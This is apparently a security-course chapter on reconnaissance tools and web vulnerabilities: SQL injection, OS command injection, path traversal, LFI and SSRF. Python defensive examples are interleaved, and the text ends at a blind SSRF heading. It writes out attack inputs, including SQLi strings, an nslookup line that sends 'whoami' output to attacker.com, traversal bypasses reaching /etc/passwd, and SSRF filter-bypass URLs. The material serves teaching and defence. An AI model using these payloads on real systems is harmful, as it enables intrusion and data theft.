4.2 The Information Gathering Process: A Step-by-Step Guide

4.2.1 Identifying Objectives and Defining Scope

• Establish precise objectives
• Define scope through documented goals, deliverables, and tasks
• Identify necessary resources and project schedule
• Anticipate challenges such as cost overruns, delays, and changing requirements

4.2.2 Selecting Appropriate Data Collection Methods

Techniques include:

• Surveys

• Interviews

• Observations

• Focus groups

• Experiments

• Secondary data analysis

Choice depends on research goals: surveys are suited for broad insights, while interviews yield qualitative
depth.

4.2.3 Analyzing and Organizing Gathered Data

Key steps:

1. Analyze and categorize data
2. Identify issues and opportunities
3. Use statistical and visualization methods (e.g., regression, time series analysis)
4. Support decision-making

Tools like NLP and machine learning (e.g., Recorded Future) enhance pattern detection and risk mitigation.

4.3 Tactical Tools for Information Gathering

4.3.1 Network Mappers and Port Scanners

Examples: Nmap

Functions:

• Identify open ports and services
• Create network maps
• Detect vulnerable services

4.3.2 Packet Sniffers and Protocol Analyzers

Examples: Wireshark, Tcpdump, PRTG

Functions:

• Capture and analyze live network traffic

• Diagnose network issues

• Store and filter packets for offline review

4.3.3 Domain and IP Research Tools

Examples: Dig, Whois, SecurityTrails API

Functions:

• Collect DNS, IP, and network metadata

• Identify misconfigurations and vulnerabilities

• Detect exposed assets

4.4 Advanced Techniques in Information Gathering

4.4.1 Penetration Testing with Metasploit Framework

Used for identifying vulnerabilities, simulating attacks, and evaluating security postures.

4.4.2 Data Mining for In-depth Analysis

Example: Maltego, which enables link analysis and real-time data correlation.

4.4.3 Leveraging Search Engines and Online Resources

Examples: Shodan.io and the Wayback Machine, which provide device metadata and historical internet data.

4.5 Practical Applications

4.5.1 Case Studies

Show real-world impact of effective data collection (e.g., Recorded Future Intelligence Graph).

4.5.2 Cybersecurity
Information gathering aids vulnerability assessment, threat detection, and penetration testing.

4.5.3 Market Research

Used by companies like Starbucks, Apple, McDonald’s, LEGO to understand consumer needs and tailor strategies.

4.6 Ethical Considerations in Information Gathering

• Follow legal and professional guidelines (e.g., ISTI, law enforcement standards)
• Avoid unethical practices like phishing, spyware deployment, or unauthorized access
• Protect privacy and maintain trust.

4.7 Maximizing Efficiency in Information Gathering

• Set clear objectives
• Use effective tools and methodologies
• Continuously refine processes

4.8 Frequently Asked Questions (FAQ)

Q: Example of gathering information?

A: Surveys, interviews, observations, record reviews, experiments.

Q: Another term for “gathering information”?

A: Researching.

Q: Fundamentals of information gathering?

A: Simplicity, planning, reliable data, stakeholder involvement, quality control.

Q: Main steps in the process?

A: Identify objectives, select methods, analyze and organize data.

Q: Examples of advanced techniques?

A: Penetration testing, data mining, search engine analysis.

Chapter 5: Vulnerabilities
5.1 Information disclosure vulnerabilities

In this section, we'll explain the basics of information disclosure vulnerabilities and describe how you
can find and exploit them. We'll also offer some guidance on how you can prevent information
disclosure vulnerabilities in your own websites.

Figure 5.1

Learning to find and exploit information disclosure is a vital skill for any tester. You are likely to
encounter it on a regular basis and, once you know how to exploit it effectively, it can help you to
improve your testing efficiency and enable you to find additional, high-severity bugs.

If you're already familiar with the basic concepts behind information disclosure vulnerabilities and just
want to practice exploiting them on some realistic, deliberately vulnerable targets, you can access all of
the labs in this topic from the link below.
5.1.1 What is information disclosure?

Information disclosure, also known as information leakage, is when a website unintentionally reveals
sensitive information to its users. Depending on the context, websites may leak all kinds of information
to a potential attacker, including:

• Data about other users, such as usernames or financial information
• Sensitive commercial or business data
• Technical details about the website and its infrastructure

The dangers of leaking sensitive user or business data are fairly obvious, but disclosing technical
information can sometimes be just as serious. Although some of this information will be of limited use,
it can potentially be a starting point for exposing an additional attack surface, which may contain other
interesting vulnerabilities. The knowledge that you are able to gather could even provide the missing
piece of the puzzle when trying to construct complex, high-severity attacks.

Occasionally, sensitive information might be carelessly leaked to users who are simply browsing the
website in a normal fashion. More commonly, however, an attacker needs to elicit the information
disclosure by interacting with the website in unexpected or malicious ways. They will then carefully
study the website's responses to try and identify interesting behavior.
5.1.2 Examples of information disclosure

Some basic examples of information disclosure are as follows:

• Revealing the names of hidden directories, their structure, and their contents via
a robots.txt file or directory listing
• Providing access to source code files via temporary backups
• Explicitly mentioning database table or column names in error messages
• Unnecessarily exposing highly sensitive information, such as credit card details
• Hard-coding API keys, IP addresses, database credentials, and so on in the source code
• Hinting at the existence or absence of resources, usernames, and so on via subtle differences in
application behavior

In this topic, you will learn how to find and exploit some of these examples and more.
5.1.3 How do information disclosure vulnerabilities arise?

Information disclosure vulnerabilities can arise in countless different ways, but these can broadly be
categorized as follows:

• Failure to remove internal content from public content. For example, developer comments in
markup are sometimes visible to users in the production environment.
• Insecure configuration of the website and related technologies. For example, failing to disable
debugging and diagnostic features can sometimes provide attackers with useful tools to help
them obtain sensitive information. Default configurations can also leave websites vulnerable,
for example, by displaying overly verbose error messages.
• Flawed design and behavior of the application. For example, if a website returns distinct
responses when different error states occur, this can also allow attackers to enumerate
sensitive data, such as valid user credentials.

5.1.4 What is the impact of information disclosure vulnerabilities?

Information disclosure vulnerabilities can have both a direct and indirect impact depending on the
purpose of the website and, therefore, what information an attacker is able to obtain. In some cases,
the act of disclosing sensitive information alone can have a high impact on the affected parties. For
example, an online shop leaking its customers' credit card details is likely to have severe consequences.

On the other hand, leaking technical information, such as the directory structure or which third-party
frameworks are being used, may have little to no direct impact. However, in the wrong hands, this
could be the key information required to construct any number of other exploits. The severity in this
case depends on what the attacker is able to do with this information.
5.1.4.1 How to assess the severity of information disclosure vulnerabilities

Although the ultimate impact can potentially be very severe, it is only in specific circumstances that
information disclosure is a high-severity issue on its own. During testing, the disclosure of technical
information in particular is often only of interest if you are able to demonstrate how an attacker could
do something harmful with it.

For example, the knowledge that a website is using a particular framework version is of limited use if
that version is fully patched. However, this information becomes significant when the website is using
an old version that contains a known vulnerability. In this case, performing a devastating attack could
be as simple as applying a publicly documented exploit.

It is important to exercise common sense when you find that potentially sensitive information is being
leaked. It is likely that minor technical details can be discovered in numerous ways on many of the
websites you test. Therefore, your main focus should be on the impact and exploitability of the leaked
information, not just the presence of information disclosure as a standalone issue. The obvious
exception to this is when the leaked information is so sensitive that it warrants attention in its own
right.
5.1.5 Exploiting information disclosure

We've put together some more practical advice to help you identify and exploit these kinds of
vulnerabilities. You can also practice these techniques using our interactive labs.
5.1.6 How to prevent information disclosure vulnerabilities

Preventing information disclosure completely is tricky due to the huge variety of ways in which it can
occur. However, there are some general best practices that you can follow to minimize the risk of these
kinds of vulnerability creeping into your own websites.

• Make sure that everyone involved in producing the website is fully aware of what information is
considered sensitive. Sometimes seemingly harmless information can be much more useful to
an attacker than people realize. Highlighting these dangers can help make sure that sensitive
information is handled more securely in general by your organization.
• Audit any code for potential information disclosure as part of your QA or build processes. It
should be relatively easy to automate some of the associated tasks, such as stripping developer
comments.
• Use generic error messages as much as possible. Don't provide attackers with clues about
application behavior unnecessarily.
• Double-check that any debugging or diagnostic features are disabled in the production
environment.

• Make sure you fully understand the configuration settings, and security implications, of any
third-party technology that you implement. Take the time to investigate and disable any
features and settings that you don't actually need.
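As an added example (not PortSwigger's text and not the report's own code), the following Python shows what three of the points above look like in practice: a build step that strips developer comments from markup, an audit that fails the build when internal addresses, credential literals or access-key-shaped strings are about to ship, and an error handler that returns a generic message with an opaque reference while the detail goes only to the server log. The sample template, the marker patterns and the logger name are assumptions made for this example; a real audit would carry a larger pattern set.

```python
import logging
import re
import uuid

log = logging.getLogger("app")

# Constructed sample template (not taken from any real site). Two developer
# comments leak an internal address, a credential literal and an access key
# id in the AWS documentation's example format.
SAMPLE_TEMPLATE = """<html>
<!-- TODO remove before release: staging DB at 10.0.3.17, db_password = 'S3cr3t-example' -->
<!-- stock service key: AKIAIOSFODNN7EXAMPLE -->
<body>
<h1>Products</h1>
<!--[if lt IE 9]><script src="/html5shiv.js"></script><![endif]-->
<p>Welcome</p>
</body>
</html>
"""

# Ordinary HTML comments. Conditional comments (<!--[if ...]>) are kept
# because legacy browsers act on them; everything else is developer-only.
DEV_COMMENT = re.compile(r"<!--(?!\[if).*?-->", re.DOTALL)

# Patterns for content that must never reach a production response.
MARKERS = {
    "aws_access_key_id": re.compile(r"\bAKIA[0-9A-Z]{16}\b"),
    "rfc1918_address": re.compile(
        r"\b(?:10\.\d{1,3}|192\.168|172\.(?:1[6-9]|2\d|3[01]))\.\d{1,3}\.\d{1,3}\b"),
    "credential_literal": re.compile(
        r"(?:password|passwd|secret)\s*[=:]\s*['\"][^'\"]+['\"]", re.IGNORECASE),
}


def strip_developer_comments(markup: str) -> str:
    """Build step: remove developer comments before the markup is deployed."""
    return DEV_COMMENT.sub("", markup)


def audit_markup(markup: str) -> list:
    """Return (marker, line_number, text) for every hit so the build can fail."""
    hits = []
    for lineno, line in enumerate(markup.splitlines(), start=1):
        for name, pattern in MARKERS.items():
            for match in pattern.finditer(line):
                hits.append((name, lineno, match.group(0)))
    return hits


def generic_error_body(exc: Exception, debug: bool = False) -> dict:
    """Client-facing error: an opaque reference, never the exception text.

    The detail (which may name tables, paths or versions) is logged under
    the same reference so support can still correlate it.
    """
    ref = uuid.uuid4().hex[:12]
    log.error("request failed ref=%s: %r", ref, exc)
    body = {"error": "An internal error occurred", "reference": ref}
    if debug:                      # only ever true in a development environment
        body["detail"] = repr(exc)
    return body


if __name__ == "__main__":
    for hit in audit_markup(SAMPLE_TEMPLATE):
        print("leak candidate:", hit)
    cleaned = strip_developer_comments(SAMPLE_TEMPLATE)
    print("after stripping:", audit_markup(cleaned))
    print(generic_error_body(RuntimeError("no such table: cust_cards")))
```

Running the audit both before and after stripping is deliberate: the comment stripper removes the usual leak, and the audit then confirms nothing matching the patterns survives in the markup that will actually be served.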

5.2 SQL injection

In this section, we explain:

• What SQL injection (SQLi) is.
• How to find and exploit different types of SQLi vulnerabilities.
• How to prevent SQLi.

5.2.1 What is SQL injection (SQLi)?

SQL injection (SQLi) is a web security vulnerability that allows an attacker to interfere with the
queries that an application makes to its database. This can allow an attacker to view data that
they are not normally able to retrieve. This might include data that belongs to other users, or
any other data that the application can access. In many cases, an attacker can modify or delete
this data, causing persistent changes to the application's content or behavior.

In some situations, an attacker can escalate a SQL injection attack to compromise the underlying
server or other back-end infrastructure. It can also enable them to perform denial-of-service
attacks.

5.2.2 What is the impact of a successful SQL injection attack?

A successful SQL injection attack can result in unauthorized access to sensitive data, such as:

• Passwords.
• Credit card details.
• Personal user information.

SQL injection attacks have been used in many high-profile data breaches over the years. These
have caused reputational damage and regulatory fines. In some cases, an attacker can obtain a
persistent backdoor into an organization's systems, leading to a long-term compromise that can
go unnoticed for an extended period.

5.2.3 How to detect SQL injection vulnerabilities

You can detect SQL injection manually using a systematic set of tests against every entry point in
the application. To do this, you would typically submit:

• The single quote character ' and look for errors or other anomalies.
• Some SQL-specific syntax that evaluates to the base (original) value of the entry point, and to a
different value, and look for systematic differences in the application responses.
• Boolean conditions such as OR 1=1 and OR 1=2, and look for differences in the application's
responses.
• Payloads designed to trigger time delays when executed within a SQL query, and look for
differences in the time taken to respond.
• OAST payloads designed to trigger an out-of-band network interaction when executed within a
SQL query, and monitor any resulting interactions.

Alternatively, you can find the majority of SQL injection vulnerabilities quickly and reliably using
Burp Scanner.

SQL injection in different parts of the query

Most SQL injection vulnerabilities occur within the WHERE clause of a SELECT query. Most
experienced testers are familiar with this type of SQL injection.

However, SQL injection vulnerabilities can occur at any location within the query, and within
different query types. Some other common locations where SQL injection arises are:

• In UPDATE statements, within the updated values or the WHERE clause.
• In INSERT statements, within the inserted values.
• In SELECT statements, within the table or column name.
• In SELECT statements, within the ORDER BY clause.

5.2.4 SQL Injection Examples

1. Retrieving hidden data – Modify queries (e.g., adding -- to comment out filters or OR 1=1 to
bypass conditions) to expose restricted or unreleased data.
2. Subverting application logic – Alter queries (e.g., administrator'--) to bypass authentication
checks.
3. UNION attacks – Append queries with UNION SELECT to extract data from other tables (e.g.,
usernames and passwords).
4. Blind SQL injection – Infer data without direct query results using Boolean conditions, time
delays, or out-of-band interactions (OAST).
5. Second-order SQL injection – Malicious input is stored safely at first but later reused in a
vulnerable query.
6. Examining the database – Use SQL queries to identify DB type, version, tables, and columns;
techniques vary by platform.
7. SQL injection in different contexts – Injection possible via any input (query strings, JSON, XML).
Encoding can bypass filters.
8. Prevention – Use parameterized (prepared) statements for all untrusted data; whitelist
table/column names when needed. Avoid string concatenation entirely.
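The following Python/SQLite example is added here to put items 1, 2 and 8 side by side; it is not code from the report or from PortSwigger. The product and user tables are constructed for the example, and the inputs are the ones named above (a quote with OR 1=1 and a -- comment, and administrator'--). Each string-concatenated query is shown next to its parameterized form, and the ORDER BY case shows why identifiers need an allowlist rather than a bind parameter.

```python
import sqlite3


def make_db() -> sqlite3.Connection:
    """Constructed in-memory catalogue: one unreleased product, two accounts."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE products (name TEXT, category TEXT, released INTEGER);
        INSERT INTO products VALUES ('Gift card', 'Gifts', 1),
                                    ('Unreleased toy', 'Gifts', 0),
                                    ('Mug', 'Kitchen', 1);
        CREATE TABLE users (username TEXT, password TEXT);
        INSERT INTO users VALUES ('administrator', 'correct-horse'),
                                 ('wiener', 'peter');
    """)
    return conn


def products_vulnerable(conn, category: str) -> list:
    # String concatenation: the caller's text becomes part of the SQL grammar,
    # so a quote plus a -- comment detaches the "released = 1" filter.
    sql = ("SELECT name FROM products WHERE category = '" + category
           + "' AND released = 1")
    return [row[0] for row in conn.execute(sql)]


def products_safe(conn, category: str) -> list:
    # Parameterised query: the value is bound after parsing and can only ever
    # be compared with the category column, quotes and all.
    sql = "SELECT name FROM products WHERE category = ? AND released = 1"
    return [row[0] for row in conn.execute(sql, (category,))]


def login_vulnerable(conn, username: str, password: str):
    sql = ("SELECT username FROM users WHERE username = '" + username
           + "' AND password = '" + password + "'")
    row = conn.execute(sql).fetchone()
    return row[0] if row else None


def login_safe(conn, username: str, password: str):
    # Plaintext comparison is kept only to focus on the query shape; a real
    # login looks the user up by name and verifies a password hash.
    sql = "SELECT username FROM users WHERE username = ? AND password = ?"
    row = conn.execute(sql, (username, password)).fetchone()
    return row[0] if row else None


# Identifiers (ORDER BY column, table name) cannot be bound as parameters,
# so they are checked against an allowlist and never taken verbatim.
SORTABLE_COLUMNS = {"name", "category"}


def products_sorted(conn, sort_by: str) -> list:
    if sort_by not in SORTABLE_COLUMNS:
        raise ValueError(f"unsupported sort column: {sort_by!r}")
    sql = f"SELECT name FROM products WHERE released = 1 ORDER BY {sort_by}"
    return [row[0] for row in conn.execute(sql)]


if __name__ == "__main__":
    db = make_db()
    payload = "Gifts' OR 1=1--"
    print("vulnerable:", products_vulnerable(db, payload))   # unreleased item leaks
    print("safe:      ", products_safe(db, payload))         # no such category
    print("login:", login_vulnerable(db, "administrator'--", "x"),
          login_safe(db, "administrator'--", "x"))
```

With the bound parameter the whole string "Gifts' OR 1=1--" is looked up as a category name and matches nothing, which is exactly the behaviour item 8 asks for; the allowlist in products_sorted is the "whitelist table/column names" half of the same rule.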

5.3 OS command injection

In this section, we explain what OS command injection is, and describe how
vulnerabilities can be detected and exploited. We also show you some useful
commands and techniques for different operating systems, and describe how to
prevent OS command injection.

5.3.1 What is OS command injection?

OS command injection is also known as shell injection. It allows an attacker to
execute operating system (OS) commands on the server that is running an
application, and typically fully compromise the application and its data. Often, an
attacker can leverage an OS command injection vulnerability to compromise other
parts of the hosting infrastructure, and exploit trust relationships to pivot the attack to
other systems within the organization.

5.3.2 Basic Example
The application calls a shell command with user-supplied arguments:
stockreport.pl 381 29
Attacker injects: & echo aiwefwlguh &
The & character separates shell commands, so the injected command runs even if the original command errors.

5.3.3 Useful Commands After Finding Injection

Linux: whoami, uname -a, ifconfig, netstat -an, ps -ef
Windows: whoami, ver, ipconfig /all, netstat -an, tasklist

5.3.4 Blind OS Command Injection Techniques

• Time delays: & ping -c 10 127.0.0.1 & confirms execution by response lag.
• Output redirection: & whoami > /var/www/static/whoami.txt & then fetch the file via the browser.
• OAST: & nslookup attacker.com & to trigger DNS/HTTP to the attacker.
• OAST with data exfiltration: & nslookup `whoami`.attacker.com & sends the output in the DNS request.

5.3.5 Shell Metacharacters for Injection

Windows & Unix: & && | ||
Unix only: ; newline (\n)
Inline execution (Unix): `command`, $(command)

5.3.6 Quoted Context Issues

If the user input is placed inside quotes in the command, the attacker first closes the quoted context (with ' or ") before injecting.

5.3.7 Prevention

• Avoid shell calls; use safer APIs
• Whitelist permitted values
• Validate that the input is numeric, where possible
• Allow only alphanumeric input, without whitespace or special characters
• Never rely on escaping shell metacharacters
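An added example (not from the report) of what "avoid shell calls" and "validate numeric" mean in code, built around the page's stockreport.pl call. The program path is a placeholder for this example. shlex is used only to show how a POSIX shell would split the page's & echo aiwefwlguh & input into a second command; nothing is executed, and the safe path passes an argv list so no shell parses the arguments at all.

```python
import re
import shlex
import subprocess

# Placeholder path for this example; stockreport.pl is the page's illustration,
# not a real installed tool.
STOCKREPORT = "/usr/local/bin/stockreport.pl"

# Only digits, bounded length: no shell metacharacter survives this check.
NUMERIC_ID = re.compile(r"[0-9]{1,9}")


def is_valid_id(value: str) -> bool:
    return NUMERIC_ID.fullmatch(value) is not None


def validate_id(value: str, field: str) -> str:
    if not is_valid_id(value):
        raise ValueError(f"{field} must be a number")
    return value


def shell_commands(cmdline: str) -> list:
    """Split a command line the way a POSIX shell would, without running it.

    Returns one argv list per command; & && ; | || act as separators. Used to
    show why the page's '& echo ... &' input becomes a second command.
    """
    lex = shlex.shlex(cmdline, posix=True, punctuation_chars=True)
    lex.whitespace_split = True
    commands, current = [], []
    for token in lex:
        if token in ("&", "&&", ";", "|", "||"):
            if current:
                commands.append(current)
            current = []
        else:
            current.append(token)
    if current:
        commands.append(current)
    return commands


def build_vulnerable(product_id: str, store_id: str) -> str:
    # One string for the shell: whatever the user typed is parsed as shell syntax.
    return f"stockreport.pl {product_id} {store_id}"


def build_safe(product_id: str, store_id: str) -> list:
    # argv list: each element is exactly one argument, and no shell parses it.
    return [STOCKREPORT,
            validate_id(product_id, "productId"),
            validate_id(store_id, "storeId")]


def run_stock_report(product_id: str, store_id: str, runner=subprocess.run):
    """Execute the report without a shell. `runner` is injectable for tests."""
    argv = build_safe(product_id, store_id)
    return runner(argv, shell=False, capture_output=True, text=True, timeout=10)


if __name__ == "__main__":
    injected = "& echo aiwefwlguh &"            # the page's detection string
    print(shell_commands(build_vulnerable("381", injected)))
    try:
        build_safe("381", injected)
    except ValueError as err:
        print("rejected:", err)
```

The two defences are independent: the argv form alone already prevents the shell from seeing a separator, and the numeric check alone already rejects the input; using both means a later refactor that reintroduces a shell call does not silently reopen the hole.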

5.4 Path traversal

In this section, we explain:

• What path traversal is.
• How to carry out path traversal attacks and circumvent common obstacles.
• How to prevent path traversal vulnerabilities.

5.4.1 What is path traversal?

Path traversal is also known as directory traversal. These vulnerabilities enable an attacker to read
arbitrary files on the server that is running an application. This might include:

• Application code and data.
• Credentials for back-end systems.
• Sensitive operating system files.

In some cases, an attacker might be able to write to arbitrary files on the server, allowing them to
modify application data or behavior, and ultimately take full control of the server.

5.4.2 Basic Path Traversal

The application loads images via /loadImage?filename=218.png, reading the file from /var/www/images/. With no filtering of the filename, an attacker requests ../../../etc/passwd, which resolves to /etc/passwd. Windows variant: ..\..\..\windows\win.ini.

5.4.3 Obstacles & Bypasses
• Absolute path bypass: Directly request /etc/passwd.
• Nested traversal: Use ....// or ....\/ if ../ stripped once.
• Encoding bypass: URL encode (%2e%2e%2f), double encode (%252e%252e%252f), or use non-standard
(..%c0%af, ..%ef%bc%8f).
• Superfluous decode bypass: If server URL-decodes multiple times, encoded traversal may survive.
• Base folder prefix bypass: /var/www/images/../../../etc/passwd.
• Extension check bypass: Null byte injection (../../../etc/passwd%00.png).

5.4.4 Prevention

• Avoid passing user input to filesystem APIs.
• If unavoidable:
o Validate: Use whitelist or restrict to safe chars (e.g., alphanumeric).
o Canonicalize & verify: Append input to base dir, canonicalize, ensure canonical path starts with base dir.
o Example in Java

5.5 Local File Inclusion (LFI)

A file inclusion vulnerability in PHP-based sites occurs when untrusted user input is used as a file location. It allows attackers to access arbitrary files.

Example Vulnerable PHP Code:

5.5.1 How LFI Works

• The $file variable holds the requested file name.
• $_GET['page'] retrieves the file/page parameter from the request.
• If unvalidated, an attacker can manipulate it.
• Example vulnerable URLs:
o Normal: http://vulnerable_host/preview.php?file=abc.html
o Malicious: http://vulnerable_host/preview.php?document=../../../../etc/passwd

5.5.2 Identifying LFI

• Check parameters that reference files (e.g., /fi/?page=include.php).
• If include.php is in /var/www/dvwa/vulnerabilities/lfi/, adding ../../../index.php accesses files outside the intended folder.

5.5.3 LFI Attack Scenarios

• Include files parsed by the interpreter.
• Include files printed to the page.
• Include files served as downloads.

5.5.4 Impacts of LFI

• Disclosure of sensitive files.
• Database passwords.
• Access to logs.
• Potential full system compromise.

5.5.5 LFI Remediation

• Do not allow direct file path modification. Use hardcoded path list.
• Restrict filename characters to safe set (a-z, 0-9).
• Limit inclusions to specific directories.
• Prevent directory traversal in file handling.
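The Java example referred to in 5.4.4 is not reproduced on the page. The Python below is added here (it is not the report's code) and implements the canonicalize-and-verify check from 5.4.4 together with the hardcoded path list from 5.5.5. The temporary directory layout is constructed for the example. It also handles two cases a plain string-prefix check gets wrong, an absolute path and a sibling directory whose name merely starts with the base directory, and it must run on the final decoded value the file API will see, since the double-decoding bypasses in 5.4.3 work against filters that inspect an earlier form of the input.

```python
import tempfile
from pathlib import Path

# LFI remediation from 5.5.5: a fixed map from page keys to files. The client
# sends a key, never a path, so there is nothing to traverse.
PAGES = {"abc": "abc.html", "index": "index.html"}


def page_for(key: str):
    """Allowlist lookup; unknown keys get the same None as traversal attempts."""
    return PAGES.get(key)


def safe_join(base_dir, user_path: str) -> Path:
    """Canonicalise base/user_path and require it to stay inside base.

    Raises ValueError for anything that escapes: ../ sequences, absolute
    paths, null bytes, symlinks pointing outside base, and a sibling such as
    images2 next to images, which a str.startswith() check would accept.
    """
    if "\x00" in user_path:
        raise ValueError("null byte in path")
    base = Path(base_dir).resolve()
    # Path joining discards base when user_path is absolute, so resolve()
    # yields /etc/passwd itself and the containment check rejects it.
    candidate = (base / user_path).resolve()
    try:
        candidate.relative_to(base)      # component-wise, not a string prefix
    except ValueError:
        raise ValueError(f"path escapes base directory: {user_path!r}") from None
    return candidate


def is_safe_path(base_dir, user_path: str) -> bool:
    try:
        safe_join(base_dir, user_path)
        return True
    except ValueError:
        return False


def make_demo_tree() -> Path:
    """Constructed layout: <tmp>/images/218.png plus a sibling <tmp>/images2/."""
    root = Path(tempfile.mkdtemp())
    images = root / "images"
    images.mkdir()
    (images / "218.png").write_bytes(b"\x89PNG demo")
    (root / "images2").mkdir()
    (root / "images2" / "secret.txt").write_text("not yours")
    return images


if __name__ == "__main__":
    base = make_demo_tree()
    for p in ["218.png", "../../../etc/passwd", "/etc/passwd",
              "../images2/secret.txt", "218.png\x00.png", "....//etc/passwd"]:
        print(f"{p!r:28} allowed={is_safe_path(base, p)}")
    print(page_for("abc"), page_for("../../../../etc/passwd"))
```

Note that the nested form ....//etc/passwd from 5.4.3 is accepted by this check, and that is correct: with no strip-once filter in front of it, "...." is just a directory name that does not exist inside the base, so the request fails with a not-found rather than reaching /etc/passwd. The check does not need to recognise bypass patterns because it decides on where the canonical path ends up, not on what the input looks like.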

5.6 Server-side request forgery (SSRF)

In this section we explain what server-side request forgery (SSRF) is, and describe some
common examples. We also show you how to find and exploit SSRF vulnerabilities.
5.6.1 What is SSRF?

Server-side request forgery is a web security vulnerability that allows an attacker to cause the
server-side application to make requests to an unintended location.

In a typical SSRF attack, the attacker might cause the server to make a connection to internal-
only services within the organization's infrastructure. In other cases, they may be able to force
the server to connect to arbitrary external systems. This could leak sensitive data, such as
authorization credentials.

5.6.2 What is the impact of SSRF attacks?

A successful SSRF attack can often result in unauthorized actions or access to data within the
organization. This can be in the vulnerable application, or on other back-end systems that the
application can communicate with. In some situations, the SSRF vulnerability might allow an
attacker to perform arbitrary command execution.

An SSRF exploit that causes connections to external third-party systems might result in malicious
onward attacks. These can appear to originate from the organization hosting the vulnerable
application.

5.6.3 Common SSRF attacks

SSRF attacks often exploit trust relationships to escalate an attack from the vulnerable
application and perform unauthorized actions. These trust relationships might exist in relation
to the server, or in relation to other back-end systems within the same organization.

SSRF attacks against the server

In an SSRF attack against the server, the attacker causes the application to make an HTTP
request back to the server that is hosting the application, via its loopback network interface.
This typically involves supplying a URL with a hostname like 127.0.0.1 (a reserved IP address that
points to the loopback adapter) or localhost (a commonly used name for the same adapter).

For example, imagine a shopping application that lets the user view whether an item is in stock
in a particular store. To provide the stock information, the application must query various back-
end REST APIs. It does this by passing the URL to the relevant back-end API endpoint via a front-
end HTTP request. When a user views the stock status for an item, their browser makes the
following request:

POST /product/stock HTTP/1.0
Content-Type: application/x-www-form-urlencoded
Content-Length: 118

stockApi=http://stock.weliketoshop.net:8080/product/stock/check%3FproductId%3D6%26storeId%3D1

This causes the server to make a request to the specified URL, retrieve the stock status, and
return this to the user.

In this example, an attacker can modify the request to specify a URL local to the server:

POST /product/stock HTTP/1.0
Content-Type: application/x-www-form-urlencoded
Content-Length: 118

stockApi=http://localhost/admin

The server fetches the contents of the /admin URL and returns it to the user.

An attacker can visit the /admin URL, but the administrative functionality is normally only
accessible to authenticated users. This means an attacker won't see anything of interest.
However, if the request to the /admin URL comes from the local machine, the normal access
controls are bypassed. The application grants full access to the administrative functionality,
because the request appears to originate from a trusted location.

5.6.4 SSRF Attacks Against Other Back-End Systems

In some cases, the application server interacts with back-end systems not directly reachable by
users, often with private IP addresses. These internal systems usually have weaker security and
may allow unauthenticated access.

For example, an admin interface at https://192.168.0.68/admin can be accessed via SSRF by
submitting:

5.6.5 Circumventing Common SSRF Defenses

Applications often have SSRF defenses, but these can frequently be bypassed.

SSRF with Blacklist-Based Input Filters

• Filters block hostnames like 127.0.0.1, localhost, or URLs like /admin.
• Bypass techniques include:
o Using alternative IP representations (e.g., 2130706433, 017700000001, or 127.1).
o Registering a domain resolving to 127.0.0.1 (e.g., spoofed.burpcollaborator.net).
o Obfuscating blocked strings via URL encoding or case variation.
o Using URLs that redirect to the target, switching protocols (http → https) to bypass
filters.

5.6.6 SSRF with Whitelist-Based Input Filters

• Filters only allow inputs matching a whitelist.
• Bypass by exploiting URL parsing quirks:
o Embedding credentials before hostname: https://expected-host:fakepassword@evil-host
o Using URL fragments: https://evil-host#expected-host
o Using DNS hierarchy: https://expected-host.evil-host
o URL-encoding or double-encoding characters to confuse parsers.
• Combining these techniques increases chances of bypass.

5.6.7 A New Era of SSRF: Bypassing Filters via Open Redirection

• Some applications validate URLs strictly but rely on APIs that follow redirects.
• If allowed URLs contain open redirect vulnerabilities, SSRF filters can be bypassed.
• Example:
o URL /product/nextProduct?currentProductId=6&path=http://evil-user.net redirects to
http://evil-user.net.
• The application validates stockApi as allowed domain, then follows redirect to internal URL.
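An added example (not PortSwigger's or the report's code) of an outbound-URL check for the stock-check feature from 5.6.3, written with the bypasses in 5.6.5 through 5.6.7 in mind: exact-match host allowlisting instead of substring matching (which is what defeats expected-host.evil-host and the numeric forms 2130706433 and 127.1), rejection of credentials in the URL, a check on the address the host actually resolves to, and a fetch that must run with redirects disabled so an open redirect on an allowed host cannot bounce the request to localhost. The allowlisted host and port come from the page's own example; the DNS answers in the demo are constructed, and the resolver is injectable so the check can be exercised offline.

```python
import ipaddress
import socket
from urllib.parse import urlsplit

# Hosts the stock-check feature may call. Exact-match entries only: the
# strings "expected-host.evil-host", "2130706433" and "127.1" are simply not
# members, so they fail before any request is built.
ALLOWED_HOSTS = {"stock.weliketoshop.net"}
ALLOWED_PORTS = {80, 443, 8080}


def resolve(host: str) -> set:
    """All addresses the host resolves to (default resolver; tests inject theirs)."""
    return {info[4][0] for info in socket.getaddrinfo(host, None)}


def is_public(address: str) -> bool:
    ip = ipaddress.ip_address(address)
    if isinstance(ip, ipaddress.IPv6Address) and ip.ipv4_mapped:
        ip = ip.ipv4_mapped            # ::ffff:127.0.0.1 is still loopback
    return not (ip.is_private or ip.is_loopback or ip.is_link_local
                or ip.is_multicast or ip.is_reserved or ip.is_unspecified)


def check_outbound_url(url: str, resolver=resolve) -> tuple:
    """Return (ok, reason). Only ok=True URLs may be fetched, and the fetch
    itself must not follow redirects (5.6.7)."""
    parts = urlsplit(url)
    if parts.scheme not in ("http", "https"):
        return False, "scheme not http(s)"
    if parts.username is not None or parts.password is not None:
        return False, "credentials in URL"      # https://expected-host:x@evil-host
    host = parts.hostname
    if not host:
        return False, "no host"
    if host not in ALLOWED_HOSTS:
        return False, f"host {host!r} not allowlisted"
    try:
        port = parts.port or (443 if parts.scheme == "https" else 80)
    except ValueError:
        return False, "malformed port"
    if port not in ALLOWED_PORTS:
        return False, f"port {port} not allowed"
    # An allowlisted name can still point at an internal address (attacker
    # controlled DNS, rebinding), so check what it actually resolves to.
    addresses = resolver(host)
    if not addresses:
        return False, f"{host} does not resolve"
    for address in addresses:
        if not is_public(address):
            return False, f"{host} resolves to non-public {address}"
    return True, "ok"


if __name__ == "__main__":
    fake_dns = {"stock.weliketoshop.net": {"93.184.216.34"}}     # constructed
    lookup = lambda h: fake_dns.get(h, set())
    for u in ["http://stock.weliketoshop.net:8080/product/stock/check?productId=6&storeId=1",
              "http://localhost/admin", "http://127.1/admin", "http://2130706433/admin",
              "https://stock.weliketoshop.net:fakepassword@evil-host/",
              "https://evil-host#stock.weliketoshop.net",
              "https://stock.weliketoshop.net.evil-host/"]:
        print(check_outbound_url(u, lookup))
```

If the legitimate back-end lives on a private address, the is_public test is replaced by a pinned set of expected addresses for that host; the point is that the decision is made on the resolved address and the exact host, never on whether a string contains "localhost" or "127.0.0.1".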

5.6.8 Blind SSRF Vulnerabilities

